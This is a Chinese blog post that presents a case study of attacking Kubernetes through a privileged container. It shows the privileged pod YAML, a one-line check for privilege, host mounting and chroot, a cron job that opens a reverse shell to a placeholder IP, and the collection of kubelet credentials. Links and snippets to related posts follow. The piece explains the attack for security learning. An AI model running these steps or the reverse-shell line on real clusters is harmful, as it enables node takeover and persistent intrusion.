K8s攻击案例:Privileged特权容器导致节点沦陷

已于 2023-12-22 09:15:53 修改
阅读量7.7k 收藏 12
点赞数 9
CC 4.0 BY-SA版权
文章标签: kubernetes 容器 云原生
于 2023-12-19 21:10:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/135098395
本文详细介绍了如何在Kubernetes中利用特权容器进行攻击,包括设置yaml文件启用特权模式,检测容器权限,挂载宿主机资源并执行计划任务,以及利用kubelet漏洞获取更多集群信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

01、概述

特权容器(Privileged Container)是一种比较特殊的容器,在K8s中运行特权容器,需要将 Privileged 设为 true ,容器可以执行几乎所有可以直接在主机上执行的操作。

基于此,利用容器的特权配置可以获取容器所在节点的权限,甚至从节点权限提升至集群管理员权限。

02、攻击场景

编写yaml文件,在securityContext中加入参数,将privileged设置为true,使用特权模式运行Pod。

4eca78bef75e5b63a62d936c111890c9.png

yaml文件内容:

apiVersion: v1
kind: Pod
metadata:
  name: pod1
spec:
  containers:
  - image: nginx
    name: pod1
    command: ['/bin/sh','-c','sleep 24h'] 
    securityContext:
      privileged: true

02、攻击过程

(1) 判断是否特权模式

在容器中可以使用命令检测当前容器是否以特权容器启动,CapEff对应的掩码值在centos中为 0000001fffffffff ,在ubuntu中为0000003fffffffff。

基于以上,可以简单的通过一行命令,如果返回的是Yes说明当前是特权模式,如果返回No则不是。

cat /proc/self/status |grep -qi "0000001fffffffff" && echo "Yes" || echo "No"

5c3db377d27756fabb9312add7e8e182.png

(2)查看当前磁盘分区情况,获取宿主机分区

547afb6dc61b0e0431f126a1eddf9225.png

(3)将宿主机目录挂载到容器里,chroot进入宿主机系统,获取宿主机的权限。

ce99294b3fee615a0ad96f191c718d4a.png

(4)此时,也可以使用计划任务反弹shell。

echo '* * * * * bash -i >& /dev/tcp/xx.xx.xx.xx/12345 0>&1' >> /var/spool/cron/root

e3c38e7ac7b6aa06ccc07fa8d85c2e0c.png

(5)在Node节点上查找kubelet配置文件,一般情况下,开启了NodeRestriction准入插件,kubelet证书可用来查看pod信息,但是不能创建Pod。下载kubecrl命令行工具, 收集信息为进一步攻击K8s集群提供必要的条件。

f4a86b78ec4732672f9130480d7a69ae.png

K8s(十二):监控与报警(163邮箱+钉钉)-Prometheus + Grafana + Alertmanager(超详细)
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!✨
04-08 3万+
🔴 K8s(十二):监控与报警(163邮箱+钉钉)-Prometheus + Grafana + Alertmanager(超详细)
K8s(六):网络插件之Calico安装与详解
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!✨
04-02 3万+
🔴 K8s(六):网络插件之Calico安装与详解
K8s进阶6——pod安全上下文、Linux Capabilities、OPA Gatekeeper、gvisor_allowprivilegeescalation和privileged
2401_87198828的博客
09-19 2674
2.测试一,当创建deployment资源时,没有匹配到“securityContext.privileged: true” 字段,说明该容器没有启用特权,可以正常创建,没有违反约束,所以最后可以正常创建deploy。2.再使用runsc创建一个容器,进入查看容器里的内核不再是宿主机的内核版本,而是gvisor自己模拟的内核,容器内所有的命令操作系统调用都是发送给模拟出来的内核,然后有它再转发到实际的宿主机内核。1.先用默认的runc创建一个容器,进去查看容器内核版本,现实的是宿主机的内核版本。
[docker]Full container capabilities (–privileged)
毛台
05-12 603
Full container capabilities (–privileged) $ docker run -t -i --rm ubuntu bash root@bc338942ef20:/# mount -t tmpfs none /mnt mount: permission denied This will not work, because by default, mo
k8s不求甚解系列:POD的特权模式
weixin_38757398的博客
12-04 4204
本文描述了k8s中的特权pod的相关定义、使用场景。在文章的后半段给出了一份笔者的实践过程,期望能够带给读者启发
k8s设置pod privileged权限(特权):securityContext.privileged=true
学亮编程手记
03-01 1万+
k8s部署es的时候需要初始化很多linux的内核参数。 但是文件系统挂载到pod容器中就会变成read-only,难以进行操作实现需求。 所以需要给POD privileged权限,然后在容器的初始化脚本或代码中去修改sysctl参数。 创建POD/deployment/daemonset等对象时, 给容器的spec指定securityContext.privileged=true即可。 ...
K8s中配置 启动 sysctl 与 privileged
LegendHonor的博客
04-21 3001
#修改privileged ReplicationController.spec.template.spec.containers.securityContext: privileged: true #修改sysctl ReplicationController.spec.template.spec.containers.command: ["bash", "-c", "ulimit ...
Kubernetes特权模式(Privileged Mode)容器
最新发布
喝醉酒的小白
02-11 1616
Kubernetes 中,特权模式是一种特殊的 Pod 配置,允许容器内的进程拥有接近宿主机的访问权限。在特权模式下运行的容器可以访问宿主机的所有设备,执行需要更高权限的系统调用,甚至可以在容器内部运行 Docker 守护进程。特权模式在 Kubernetes 中提供了更高的灵活性和访问权限,但同时也带来了安全风险。在实际使用中,应权衡利弊,谨慎使用特权模式,并采取适当的安全措施来保护集群集的安全。希望这份笔记能帮助你更好地理解和使用 Kubernetes 中的特权模式容器
SPC:超级特权容器演示
06-21
**SPC:超级特权容器** SPC,全称为Super Privileged Container,是一种具有高级权限的容器技术,允许在容器内部执行通常受限制的系统操作,如直接访问主机操作系统、硬件资源以及修改系统设置。这种技术在某些场景...
揭秘K8s Pod安全:从SCC的实践到现在的PSA的全面解析
力哥讲技术
04-28 1404
对于和 containerd 类似,通过 Linux namespace 和 Cgroup 实现的一类 容器技术,本质上,容器就是 宿主节点的一个进程,出于安全考虑,最小权限原则,在生产中,很少使用 Root 来运行一些业务进程,即很少通过 根用户 来运行相关容器。避免 特权升级,容器逃逸,以及利用不必要权限来增加意外操作或者恶意行为。
现在k8s新版里,如何在每个node上运行一个带privileged的daemonset
weixin_30667649的博客
04-03 1788
以前,我们会在kubelet上加--allow-prividged启动参数来实现。 而现在,更推荐的是用pod secureity policy来实现。前面的那种方式以后会被废弃。 https://kubernetes.io/docs/concepts/policy/pod-security-policy/ https://docs.projectcalico.org/v3.6/gettin...
kubernetes创建资源对象yaml文件例子--pod
lyk-ops
07-26 909
kubernetes创建pod的yaml文件,参数说明 apiVersion: v1 #指定api版本,此值必须在kubectl apiversion中 kind: Pod #指定创建资源的角色/类型 metadata: #资源的元数据/属性 name: web04-pod #资源的名字,在同一个namespace中必须唯一 labels: #设定资源的标签,...
K8s 权限管理详解
民工哥的博客
07-01 640
戳下方名片,关注并星标!回复“1024”获取2TB学习资源!????体系化学习:运维工程师打怪升级进阶之路 4.0— 特色专栏—MySQL/PostgreSQL/MongoDBElasticSearch/Hadoop/RedisKubernetes/Docker/DevOpsKafka/RabbitMQ/Zookeeper监控平台/应用与服务/集群管理N...
docker的privilegedk8sprivileged 设置方式
Asa_Prince的博客
02-19 6629
有一个容器想要从docker直接运行改造成kubernetes部署,结果发现很多文件的权限,在docker和kubernetes中不一样 1、docker 运行privileged命令:docker run -t -i --privileged centos:latest bash 2、kubernetes 里面比较完整定义了 SecurityContext: capabilities: add: ["NET_ADMIN"] 需要在pod的yml中增加如下定义 ...
【收藏】docker的privilegedk8sprivileged 设置方式
学亮编程手记
07-28 1713
https://blog.csdn.net/Asa_Prince/article/details/113865008
Docker 容器安全(1):我的容器真的需要privileged权限吗?
小楼一夜听春雨,深巷明朝卖杏花
09-11 4627
容器安全是一个很大的话题,容器的安全性很大程度是由容器的架构特性所决定的。比如容器与宿主机共享 Linux 内核,通过 Namespace 来做资源的隔离,通过 shim/runC 的方式来启动等等。 这些容器架构特性,在你选择使用容器之后,作为使用容器的用户,其实你已经没有多少能力去对架构这个层面做安全上的改动了。你可能会说用Kata Container、gVisor 就是安全“容器”了。不过,Kata 或者 gVisor 只是兼容了容器接口标准,而内部的实现完全是另外的技术了。 那么对于使用容器的.
19 | 容器安全(1):我的容器真的需要privileged权限吗?
草办的学习记录
09-07 2244
本文仅作为学习记录,非商业用途,侵删,如需转载需作者同意。 下面说下容器安全的模块。 容器的安全很大程度由容器的架构特性决定的:比如容器与宿主机共享Linux 内核,通过Namespace来做资源的隔离,通过 shim/runC 的方式来启动等。 这些容器架构特性,在选择使用容器之后,作为容器的用户,其实没有多少能力去对架构层面做安全上的改动了。 你可能会说用Kata Container、gVisor 就是安全“容器”了。不过,Kata 或者 gVisor 只是兼容了容器接口标准,而内部的实现完全是另外.
K8s进阶6——pod安全上下文、Linux Capabilities、OPA Gatekeeper、gvisor
百慕卿君博客
05-27 4379
1、pod安全上下文Security Context,特权容器替代方案Linux Capabilities。 2、pod安全策略psp简介,psp替代方案OPA Gatekeepe,包括rego模板、策略编写。 3、gvisor容器沙箱技术,与docker集成,与containerd集成。 4、Linux内核升级。
k8s安装flannel网络插件
05-11
安装Flannel网络插件需要以下步骤: 1. 在所有节点上安装flannel二进制文件: ```bash $ wget https://github.com/coreos/flannel/releases/download/v0.13.0/flannel-v0.13.0-linux-amd64.tar.gz $ tar -xvf flannel-v0.13.0-linux-amd64.tar.gz $ cd flannel-v0.13.0-linux-amd64 $ sudo cp flanneld /usr/local/bin/ $ sudo cp mk-docker-opts.sh /usr/local/bin/ ``` 2. 创建flannel配置文件 `/etc/kubernetes/cni/net.d/10-flannel.conf`: ```bash { "cniVersion": "0.3.1", "name": "flannel", "type": "flannel", "delegate": { "isDefaultGateway": true } } ``` 3. 在所有节点上启动flannel服务: ```bash $ sudo systemctl start flanneld ``` 4. 验证flannel是否运行正常: ```bash $ sudo systemctl status flanneld ``` 5. 在Master节点上检查kubelet配置文件 `/etc/kubernetes/kubelet.conf`是否包含以下内容: ```yaml apiVersion: v1 clusters: - cluster: certificate-authority: /etc/kubernetes/pki/ca.crt server: https://127.0.0.1:6443 name: kubernetes contexts: - context: cluster: kubernetes user: system:node:<node-name> name: default current-context: default kind: Config preferences: {} users: - name: system:node:<node-name> user: client-certificate: /etc/kubernetes/pki/apiserver-kubelet-client.crt client-key: /etc/kubernetes/pki/apiserver-kubelet-client.key ``` 6. 在Master节点上创建kube-flannel.yml文件: ```yaml apiVersion: v1 kind: ConfigMap metadata: name: kube-flannel-cfg namespace: kube-system labels: tier: node app: flannel data: cni-conf.json: | { "name": "cbr0", "cniVersion": "0.3.1", "plugins": [ { "type": "flannel", "delegate": { "isDefaultGateway": true } }, { "type": "portmap", "capabilities": { "portMappings": true } } ] } net-conf.json: | { "Network": "10.244.0.0/16", "Backend": { "Type": "vxlan" } } --- apiVersion: extensions/v1beta1 kind: DaemonSet metadata: name: kube-flannel-ds namespace: kube-system labels: tier: node app: flannel spec: updateStrategy: type: RollingUpdate selector: matchLabels: tier: node app: flannel template: metadata: labels: tier: node app: flannel spec: hostNetwork: true containers: - name: kube-flannel image: quay.io/coreos/flannel:v0.13.0-rc2 command: - /opt/bin/flanneld args: - --ip-masq - --kube-subnet-mgr - --iface=$(POD_IP) env: - name: POD_IP valueFrom: fieldRef: fieldPath: status.podIP securityContext: privileged: true volumeMounts: - name: flannel-cfg mountPath: /etc/kube-flannel/ volumes: - name: flannel-cfg configMap: name: kube-flannel-cfg - name: run hostPath: path: /run type: "" ``` 7. 在Master节点上应用kube-flannel.yml: ```bash $ kubectl apply -f kube-flannel.yml ``` 8. 检查所有节点上的flannel是否运行正常: ```bash $ kubectl get pods -n kube-system ``` 如果所有节点上的flannel状态都是Running,则表示flannel网络插件安装成功。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值